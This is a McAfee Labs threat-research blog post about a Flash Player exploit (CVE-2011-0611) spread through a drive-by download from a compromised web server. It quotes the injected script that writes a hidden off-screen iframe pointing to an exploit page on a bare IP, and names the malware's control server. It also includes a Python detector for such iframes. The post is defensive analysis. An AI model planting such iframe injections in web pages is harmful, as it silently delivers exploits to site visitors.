Chintan Shah is a security research lead with McAfee Labs, focused on several areas of advanced threat research, ...
Adobe released a security advisory warning users of a zero-day vulnerability in Adobe Flash Player versions 10.2.152.33 and earlier. An exploit targeting this vulnerability was embedded inside Microsoft Excel documents and was used to deliver the malicious code to victims. McAfee Labs performed a detailed technical analysis of the exploit and learned that the Flash Player object embedded inside the Excel document carried the malicious shellcode (shown below), which in turn loaded another Flash object to exploit the vulnerability via the classical heap-spray technique.
A couple of weeks ago we came across another variation in this attack via a drive-by download through a compromised web server.
A drive-by download usually goes like this:
var e=new Date();e.setDate(e.getDate()+1);e.setHours(0,0,0);e.setTime(e.getTime());
document.write("<iframe frameborder=0 style='position: absolute; top:-9999px;left:-9999px' src='http://22.214.171.124/dir/AI/exploit.html' width=468 height=60 scrolling=no></iframe>");
The browser then connects to this URL and downloads the exploit.html page.
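As an added, defender-side illustration (editor-supplied example code, not McAfee's): a small Python scanner that flags iframes showing the traits of the injection above, namely off-screen CSS positioning or zero size, a host that differs from the site or is a bare IP literal, and emission from an inline script. The sample page, the site host name and the second (benign) iframe are constructed; the exploit URL is the one quoted in the post.

```python
import re
from urllib.parse import urlsplit

# Constructed sample page: the hidden-iframe injection quoted in the post plus a benign, visible iframe.
SAMPLE_PAGE = """<html><body><h1>News</h1>
<script>var e=new Date();e.setDate(e.getDate()+1);e.setHours(0,0,0);e.setTime(e.getTime());
document.write("<iframe frameborder=0 style='position: absolute; top:-9999px;left:-9999px' src='http://22.214.171.124/dir/AI/exploit.html' width=468 height=60 scrolling=no></iframe>");</script>
<iframe src="https://video.example.com/embed/42" width="640" height="360"></iframe>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
OFFSCREEN_RE = re.compile(r"(?:top|left)\s*:\s*-\d{3,}px", re.IGNORECASE)
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

def parse_attrs(attr_text):
    """Turn the inside of an <iframe ...> tag into a lower-cased attribute dict."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs

def find_suspicious_iframes(html, site_host):
    """Return [(src, [reasons])] for iframes carrying drive-by injection traits."""
    script_spans = [m.span() for m in SCRIPT_RE.finditer(html)]
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        style = attrs.get("style", "")
        src = attrs.get("src", "")
        host = urlsplit(src).hostname or ""
        reasons = []
        if OFFSCREEN_RE.search(style):
            reasons.append("positioned off-screen")
        if attrs.get("width", "1") == "0" or attrs.get("height", "1") == "0":
            reasons.append("zero-sized")
        if host and host != site_host:
            reasons.append("loads from another host")
        if IP_RE.match(host):
            reasons.append("host is a bare IP literal")
        if any(a <= m.start() < b for a, b in script_spans):
            reasons.append("emitted from inline script")
        # A stealth trait (off-screen or zero-sized) is the trigger; the other reasons are context.
        if "positioned off-screen" in reasons or "zero-sized" in reasons:
            findings.append((src, reasons))
    return findings
```

Calling `find_suspicious_iframes(SAMPLE_PAGE, "www.example.com")` reports only the off-screen iframe, with all four reasons attached, and leaves the visible video embed alone.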
This page was still alive during our investigation. Its contents looked like this:
The browser makes this request to download newsvine.jp2.
Another GET request downloads the Flash object:
Next we see the Flash ActionScript that we decompiled from the Flash object. The highlighted part within the code is another embedded Flash object containing the exploit code.
While analyzing newsvine.jp2, we suspected this binary could have been authored in China because the resource section of the file carries locale ID 2052, which maps to China.
The version information of swf.exe contains the string zchuang, which could be the author’s name.
Once executed, the malware attempts to connect to the control server jeentern.dyndns.org on port 80.
McAfee Intrusion Prevention (formerly IntruShield) has released coverage for the Adobe Flash zero-day download Trojan under the attack signature 0x402a1700-HTTP: Adobe Flash Drive By Download Trojan. McAfee customers with up-to-date installations are protected against this malware.
-------- UPDATE -----------
To clarify – this exploits CVE-2011-0611 and NOT a new 0-day or new vulnerability. Sorry if the earlier lack of specificity caused any confusion!